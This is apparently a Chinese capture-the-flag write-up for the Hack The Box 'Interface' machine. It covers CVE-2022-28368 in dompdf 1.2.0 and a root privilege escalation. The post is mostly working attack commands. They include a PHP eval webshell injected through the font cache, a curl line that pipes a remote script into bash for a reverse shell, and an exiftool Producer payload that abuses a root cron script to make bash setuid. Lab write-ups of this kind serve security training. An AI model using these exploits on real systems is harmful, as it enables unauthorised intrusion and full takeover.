hackthebox htb interface:CVE-2022-28368

news2024/11/17 15:31:32

本题考察:CVE-2022-28368

CVE-2022-28368 - 通过远程 CSS 字体缓存安装的 RCE

参考:

https://www.0le.cn/archives/58.htmlhackthebox-interface信息搜集nmap扫描端口发现开放的22和80PORT STATE SERVICE REASON22/tcp open ssh syn-ac...https://www.0le.cn/archives/58.html

dompdf-rce/exploit

cd /tmp;
git clone https://github.com/positive-security/dompdf-rce
cd dompdf-rce;

cd /tmp/dompdf-rce/exploit/;
cat  exploit.css
sed -i "s/localhost:9001/10.10.14.53/g"  exploit.css;
cp exploit_font.php exploit_font.php.bak;

sed -i "s|\(<?php phpinfo(); ?>\)|<?php eval(\$_POST[2]);|g" exploit_font.php; 
tail exploit_font.php;


cd /tmp/dompdf-rce/exploit/;
python -m http.server 80 &

接下来发post包(win10 x64 cmd下):

注意^< 和 ^>做了转义

-x 是走BurpSuite的http8080代理,不需要走代理可以删除.

curl -v -x http://127.0.0.1:8080 -d  "{\"html\": \"title=^<link rel=stylesheet href='http://10.10.14.53/exploit.css'^>\"}"  "http://prd.m.rendering-api.interface.htb/api/html2pdf"

计算md5:

echo -n "http://10.10.14.53/exploit_font.php" | md5sum
ae6cfa0a356a3b98582afa39ee67bf43  -

最后反弹shell:

curl -v -x http://127.0.0.1:8080 -d "2=system('curl+10.10.14.53:30088/ccc.sh|bash');" http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_ae6cfa0a356a3b98582afa39ee67bf43.php

路径要注意:

/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_ae6cfa0a356a3b98582afa39ee67bf43.php

接下来提权:

bash-4.4$ grep bash /etc/passwd;
root:x:0:0:root:/root:/bin/bash
dev:x:1000:1000:,,,:/home/dev:/bin/bash
bash-4.4$

上传pspy64工具到靶机，运行看一下进程。

发现了一个root权限运行的，访问用户的sh文件，很可疑

2023/05/20 10:41:25 CMD: UID=0     PID=1      | /sbin/init maybe-ubiquity 
2023/05/20 10:42:01 CMD: UID=0     PID=33487  | /bin/bash /usr/local/sbin/cleancache.sh 
2023/05/20 10:42:01 CMD: UID=0     PID=33486  | /bin/sh -c /usr/local/sbin/cleancache.sh 
2023/05/20 10:42:01 CMD: UID=0     PID=33485  | /usr/sbin/CRON -f 
2023/05/20 10:42:01 CMD: UID=0     PID=33490  | /bin/bash /usr/local/sbin/cleancache.sh 
2023/05/20 10:42:01 CMD: UID=0     PID=33489  | /bin/bash /usr/local/sbin/cleancache.sh 
2023/05/20 10:42:01 CMD: UID=0     PID=33488  | /bin/bash /usr/local/sbin/cleancache.sh 
2023/05/20 10:42:01 CMD: UID=0     PID=33491  | 
2023/05/20 10:42:01 CMD: UID=0     PID=33492  | /bin/bash /usr/local/sbin/cleancache.sh 
2023/05/20 10:42:01 CMD: UID=0     PID=33494  | /bin/bash /usr/local/sbin/cleancache.sh 
2023/05/20 10:42:01 CMD: UID=0     PID=33493  | /usr/bin/perl -w /usr/bin/exiftool -s -s -s -Producer /tmp/test_original 
2023/05/20 10:42:01 CMD: UID=0     PID=33497  | /bin/bash /usr/local/sbin/cleancache.sh 
2023/05/20 10:42:01 CMD: UID=0     PID=33496  | /usr/bin/perl -w /usr/bin/exiftool -s -s -s -Producer /tmp/yyxx 
2023/05/20 10:42:01 CMD: UID=0     PID=33495  | /bin/bash /usr/local/sbin/cleancache.sh

ls -al /usr/local/sbin/cleancache.sh ;

cat /usr/local/sbin/cleancache.sh ;

#! /bin/bash
cache_directory="/tmp"
for cfile in "$cache_directory"/*; do

    if [[ -f "$cfile" ]]; then

        meta_producer=$(/usr/bin/exiftool -s -s -s -Producer "$cfile" 2>/dev/null | cut -d " " -f1)

        if [[ "$meta_producer" -eq "dompdf" ]]; then
            echo "Removing $cfile"
            rm "$cfile"
        fi

    fi

done

cat <<EOF>/tmp/.xxyy.sh
#!/bin/bash
id>/tmp/.iidd123;
chattr +a /tmp/.iidd123;
chmod +s /bin/bash;
EOF

chmod +x /tmp/.xxyy.sh;
chattr +a /tmp/.xxyy.sh;

touch  /tmp/.yy22;

/usr/bin/exiftool -Producer='a[$(/tmp/.xxyy.sh>&2)]+42' /tmp/.yy22;

ln -s  /tmp/.yy22  /tmp/yy22;

# /usr/bin/exiftool -s -s -s -Producer /tmp/.yy22 

# /usr/bin/exiftool -s -s -s -Producer /tmp/.yy22 2>/dev/null | cut -d " " -f1

<pdf:Producer>x[$(touch /tmp/0xdf)]</pdf:Producer>



bash-4.4$ /usr/bin/exiftool -s -s -s -Producer /tmp/test_original 
x[$(touch /tmp/0xdf)]
bash-4.4$

实际上是if里触发执行的,测试命令如下:

meta_producer=$(echo "a[\$(/tmp/.xxyy.sh>&2)]+4");
echo "$meta_producer";

if [[ "$meta_producer" -eq "dompdf" ]]; then
            echo "Removing 123123"
fi

最后bash -p:

bash-4.4# cat /root/root.txt 
02246920fd2785965ecf72ecaa22d8f3
bash-4.4# 
bash-4.4# cat /home/dev/user.txt 
f8e3acc434850f1527f6860f4b1222eb
bash-4.4#

事后:

# id
uid=0(root) gid=0(root) groups=0(root)
# crontab  -l
# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h  dom mon dow   command
*/2 * * * * /usr/local/sbin/cleancache.sh
*/5 * * * * /root/clean.sh
# 


# bash
root@interface:/tmp# cat /root/clean.sh 
#! /bin/bash
find /var/www/api/vendor/dompdf/dompdf/lib/fonts/ -type f -cmin -5 -exec rm {} \;
cp /root/font_cache/dompdf_font_family_cache.php.bak /root/font_cache/dompdf_font_family_cache.php
chown www-data /root/font_cache/dompdf_font_family_cache.php
chgrp www-data /root/font_cache/dompdf_font_family_cache.php
mv /root/font_cache/dompdf_font_family_cache.php /var/www/api/vendor/dompdf/dompdf/lib/fonts/dompdf_font_family_cache.php
root@interface:/tmp# 



root@interface:/tmp# uname -a
Linux interface 4.15.0-202-generic #213-Ubuntu SMP Thu Jan 5 19:19:12 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
root@interface:/tmp# cat /etc/os-release 
NAME="Ubuntu"
VERSION="18.04.6 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.6 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
root@interface:/tmp# free -h
              total        used        free      shared  buff/cache   available
Mem:           1.9G        233M        690M         14M        1.0G        1.5G
Swap:          1.0G          0B        1.0G
root@interface:/tmp# 


root@interface:/var/www/html# cat /var/www/api/vendor/dompdf/dompdf/VERSION;
1.2.0
root@interface:/var/www/html# 




bash-4.4$ cat /var/www/api/composer.json;
{
  "require": {
    "bramus/router": "~1.6",
    "dompdf/dompdf": "1.2.0"
  }
}

bash-4.4$

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/548587.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！